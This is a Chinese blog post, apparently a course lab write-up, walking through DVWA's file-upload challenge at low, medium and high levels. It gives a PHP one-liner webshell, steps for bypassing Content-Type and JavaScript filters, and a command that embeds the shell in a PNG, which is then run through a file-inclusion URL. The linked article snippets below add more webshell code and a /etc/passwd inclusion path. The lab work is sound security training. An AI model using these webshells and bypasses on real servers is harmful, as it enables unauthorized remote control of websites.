DVWA--文件上传(初中高)

最新推荐文章于 2024-06-13 08:40:19 发布
最新推荐文章于 2024-06-13 08:40:19 发布
阅读量2.2k 收藏 17
点赞数 19
分类专栏: DVWA 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firecjh/article/details/131131670
版权

任务一:文件上传初级

实验环境:

配置DVWA平台,点击File Upload

进入DVWA平台,选择DVWA Security,将安全级别设置为low。

步骤:

  1. 上传一句话木马文件,给出上传成功的截图,一句话木马文件名用自己姓名拼音命名,比如lwx.php

<?php @eval($_POST['a']);?>

  1. 用蚁剑连接,给出蚁剑测试连接成功的截图以及连接到网站后台的截图。

任务一:文件上传中级

配置DVWA平台, 点击File Upload

进入DVWA平台,选择DVWA Security,将安全级别设置为Medium。

  1. 源码分析,中级加了什么过滤方式

  1. 方法1:使用Content-Type过滤绕过。(木马文件以自己姓名拼音命名)
  1. 使用bp抓包将php文件的的Content-Type改为将content-type改为image/jpeg或者image/png

  1. 上传一句话木马。给出上传成功的截图。

  1. 使用蚁剑连接。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。

  1. 方法2:前端JS过滤绕过。(木马文件以自己姓名拼音命名)

1)将木马文件命名为.jpg或者png,绕过前端JS的验证, 用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。

2)上传一句话木马。给出上传成功的截图。

3)使用蚁剑连接。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。

任务二:文件上传高级

配置DVWA平台, 点击File Upload

进入DVWA平台,选择DVWA Security,将安全级别设置为High。

  1. 源码分析,高级加了什么过滤。

  1. 制作图片马,图片马用自己的姓名的拼音命名。
  1. copy /b 1.png+lwx.php 2.png

2)查看图片马最后被追加的一句话木马。

  1. 上传图片马,给出上传成功的截图。

  1. 分析此时用蚁剑连接图片马失败的原因。

此时由于图片马中的php代码并没有被解析,所以不能直接使用蚁剑进行连接,需要配合其他漏洞。 此时可以结合文件包含漏洞获取webshell

  1. 利用文件包含漏洞解析并执行代码。

点到file Inclusion。此时的级别为high。将page换成我们要包含的木马文件路径:

page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。

(以自己电脑实际路径和命名为准)

  1. 用蚁剑连接,并添加cookie头。

url中输入包含图片马的的链接:

http://192.168.56.144/DVWA-master/vulnerabilities/fi/?page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png

(以自己电脑实际路径为准)

添加cookie

成功连接蚁剑

  1. 分析第六步中连接蚁剑时为什么要加cookie头。

一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置cookie,如果是通过文件包含来连接,就需要设置cookie,因为dvwa/vulnerabilities/fi路径下的index.php文件(也就是存在文件包含漏洞的文件)是需要验证cookie才能访问的。

像雾若雨又如风
关注
  • 19
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA】18. File Upload 文件上传High+Impossible)
Zichel77的博客
01-11 1100
验证文件内容:代码使用getimagesize()函数来验证上传文件的内容是否为有效的图像。移动文件:如果上传的文件通过了所有检查,代码使用move_uploaded_file()函数将文件移动到目标路径。这是为了确保上传的文件位于安全的目录中,并且可以通过正确的URL访问。生成目标路径:代码使用basename()函数获取上传文件的基本名称,并将其附加到服务器上的目标路径上。移动文件:如果上传的文件通过了所有验证,代码使用move_uploaded_file()函数将文件从临时路径移动到目标路径。
dvwa中的文件上传漏洞
无痕的博客
01-12 7949
dvwa漏洞环境演示文件上传漏洞
利用DVWA演示文件上传漏洞获取网站shell权限(High级别
最新发布
weixin_43822401的博客
06-13 589
文件上传漏洞是网络安全中常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件到服务器上,从而获得对网站的远程控制权限。本文将以DVWA (Damn Vulnerable Web Application) 为例,演示如何利用文件上传漏洞的High级别设置,绕过文件类型和内容限制,获得网站的shell权限。
文件上传DVWA文件上传攻略
wj33333的博客
11-17 451
通过源码分析我们可以看到,他对上传的文件类型进行过滤,只允许image/jpeg和image/png文件上传,否则不成功,但是他没有审核内容,所以我们使用图片木马轻松绕过,配合中国蚁剑拿到权限.我们通过源码可以看到对于文件上传没有做任何过滤,允许所有文件进行上传.所有我们使用一句话木马,配合中国蚁剑就能成功拿到权限.我们要修改图片后缀为php,(因为要和中国蚁连接)放包.但是我们已经将木马图片上传成功,所以尝试使用文件包含。或者上传图片抓包.将一句话木马写到图片后面。上传图片木马成功了.
DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 8104
dvwa靶场实践-低中三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1621
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
dvwa靶场文件上传high
W286734的博客
01-25 1605
合成图片码的方法此链接的最下面的部分上传图片码尝试连接这里因为图片为png格式无法解析但是有的图片码是可以直接解析。此时我们可以利用dvwa的文件包含low那一关尝试,因为在文件包含漏洞中会把不是php格式的文件也按照php文件解析。
DVWA-master.zip
01-04
DVWA由多个安全级别组成,包括“低”、“中”、“”和“不可能”,每个级别都包含不同类型的漏洞。这些级别的划分是为了让学习者能够逐步深入,从简单的漏洞开始,逐渐挑战更复杂的攻击场景。例如,“SQL注入”、...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
DVWAPHP文件上传漏洞(File Upload)
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传的文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 1623
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
DVWA安装
wwl012345的博客
08-04 741
一、DVWA介绍 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十四个模块,分别是: Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站...
DVWA--File Upload(文件上传)--四个等级
1stPeak's Blog
10-29 2967
这里我们以DVWA的测试环境进行演练(这里利用php的一句话木马进行攻击) DVWA有四个等级:Low、Medium、High、Impossible Low: 我们先查看Low级别的源码,看看有无漏洞可利用 源代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { $target_path = DVWA_WEB_PAGE_TO_ROOT ...
dvwa 文件上传 high等级文件上传 low命令执行+文件包含
weixin_45498459的博客
04-26 2033
文件包含 low <?php phpinfo();@eval($_POST[pp]);?>创建 a1.php 写入一句话木马 访问链接 127.0.0.1/dvwa-master/vulnerabilities/upload/../../hackable/uploads/a1.php ​ medium 需要用到 bp 和低等级代码比较 多了一条校验 mime类型的过滤条件 可以用 bp抓包修改 打开浏览器 代理 设置好bp的地址两边需要相同的ip和端..
High级别文件上传
qq_43592364的博客
05-19 4273
漏洞:文件上传 打开火狐浏览器进入DVWA靶场,将安全等级设置为High 编写一个文件攻击脚本文件并且任意选择一张图片 PHP的一句话木马 注意:现在Windows10的安全性做的相当,有可能刚刚保存好编辑完的攻击脚本就会被Windows Defend视为病毒误杀,这里提供一个工具可以关闭Windows Defend,这样就可以确保攻击脚本不被误杀 一键开启关闭Windows Defend...
dvwa File Inclusion(文件包含) 低中各个级别介绍及破解过程
weixin_44286136的博客
05-19 963
本地文件包含 http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似 本地文件包含+webshell 1.制作一句话木马 1234.jpg 推荐软件 edjpgcom <?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?> 2.上传图片木马文件 3.执行文件包含 并产生后门 4.通过菜刀连接 ...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
DVWA File Upload(文件上传)全等级
柠檬i的博客
12-19 1768
File Upload(文件上传) 目录:File Upload(文件上传)一句话木马的构成1. Low1.上传一句话木马1.php2.中国蚁剑2.Medium3. High4.Impossible 一句话木马的构成 常见的一句话木马: <?php @eval($_POST['shell']); ?> 最外层的是 <?php和?> 这是php文件的起始和结束标记, php会解析执行 <?php ?>里面的代码。 然后是eval函数,eval()函数把字符串按照 PHP
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击、命令执行等,用户可以通过对这些漏洞进行测试和攻击来提自己的网络安全意识和技能。 dvwa-master zip的安装非常简便,只需将其解压到服务器的Web目录下,并配置好数据库连接信息即可。一旦安装完成,用户就可以通过浏览器访问dvwa-master zip的前端界面,并开始进行安全测试和漏洞扫描。 dvwa-master zip提供了多个不同的安全级别,从易到难,供用户选择。在低级别中,漏洞和脆弱性的例子会更为简单和明显;而在级别中,这些漏洞将会更加难以察觉和利用,需要用户具备更的技术水平。 通过dvwa-master zip,用户可以模拟和测试真实的网络安全风险,学习如何防范和修复相关漏洞。它对于安全工程师、渗透测试人员、Web开发人员等具有较的教育和培训价值。值得注意的是,dvwa-master zip仅用于合法的安全研究和学习目的,未经授权的攻击行为是不被允许的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值